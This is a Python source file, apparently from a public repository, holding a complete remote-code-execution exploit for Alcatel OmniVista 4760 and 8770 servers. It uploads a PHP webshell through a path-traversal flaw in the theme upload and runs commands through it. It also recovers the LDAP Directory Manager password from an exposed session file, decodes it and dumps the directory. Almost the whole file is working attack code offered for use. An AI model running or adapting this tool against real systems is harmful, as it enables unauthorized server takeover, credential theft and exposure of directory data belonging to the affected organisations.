omnivista-rce/omnivista.py
2019-11-22 10:17:43 +01:00

117 lines
3.4 KiB
Python
Executable File

import requests
import socket
import ldap
from urllib.parse import urlparse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class OmniVista:
def __init__(self, host):
self.host = host
self.addr = (urlparse(self.host).hostname)
self.folders = ['php-bin/', 'soap-bin/', 'bin/', 'data/', 'Themes/', 'log/']
self.filename = "poc.php"
self.webshell = "<?php system($_REQUEST[0]) ?>"
def identify(self):
r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
if '8770' in r.text:
return 8770
elif '4760' in r.text:
return 4760
else:
return False
def checkldap(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
result = s.connect_ex((self.addr, 389))
if result == 0:
return True
def info(self):
r = requests.post(self.host + 'php-bin/info.php', data={"void": "phDPhd"}, verify=False)
if 'PHP Version' in r.text:
return r.text
else:
return False
def getpassword(self):
r = requests.get(self.host + 'php-bin/Webclient.php', verify=False)
id = r.headers['Set-Cookie'].split(";")[0].split("=")[1]
r = requests.get(self.host + 'sessions/sess_' + id, verify=False)
lenght = int(r.text.split("ldapSuPass")[1][3:5])
password = r.text.split("ldapSuPass")[1][7:7+lenght]
return password
def decodepassword(self, password):
counter = 0
key = 16
cleartext = ""
if password[0:5] == "{NMC}":
password = password[5:]
else:
return False
for char in password:
if 32 <= ord(char):
char = chr(ord(char) ^ key)
cleartext += char
else:
cleartext += char
if ord(char) != 0:
key = counter * ord(char) % 255 >> 3
else:
key = 16
counter += 1
return cleartext
def connectldap(self):
connect = ldap.initialize('ldap://' + self.addr)
connect.set_option(ldap.OPT_REFERRALS, 0)
connect.simple_bind_s(self.username, self.password)
result = connect.search_s('o=nmc', ldap.SCOPE_SUBTREE)
print(result)
def exploit4760(self):
for folder in self.folders:
r = requests.post(self.host + 'php-bin/webclient.php',
data = {"action": "saveTheme", "themeId": "5/../../{}".format(folder), "themeDate": ""},
files = { "BgImg1": (self.filename, self.webshell, "image/png")},
verify=False)
if 'success' in r.text:
self.folder = folder
return True
def exec4760(self, cmd):
return requests.post(self.host + self.folder + 'poc.php', data = {"0": cmd}, verify=False).text
def autoexploit(self):
print('[*] Attempting to exploit on {}'.format(self.host))
self.model = self.identify()
if self.model == 4760:
print('[*] Model is {}'.format(str(self.model)))
self.exploit4760()
print('[*] Upload folder is {}'.format(self.folder))
output = self.exec4760("whoami")
print('[*] Webshell at {}{}{}'.format(self.host, self.folder, self.filename))
print('[*] Command output: '.format(output))
elif self.model == 8770:
print('[*] Model is {}'.format(str(self.model)))
self.username = "cn=Directory Manager"
self.password = self.decodepassword(self.getpassword())
print('[*] {} password is "{}"'.format(self.username, self.password))
if self.checkldap():
print('[*] LDAP Service is accessible!')
self.connectldap()
print("Stuff here")
else:
print("[x] LDAP Service is not directly accessible")
return False
else:
print("[x] Target is not an OmniVista 4760/8770")
return False
#exploit = OmniVista('')
#exploit.autoexploit()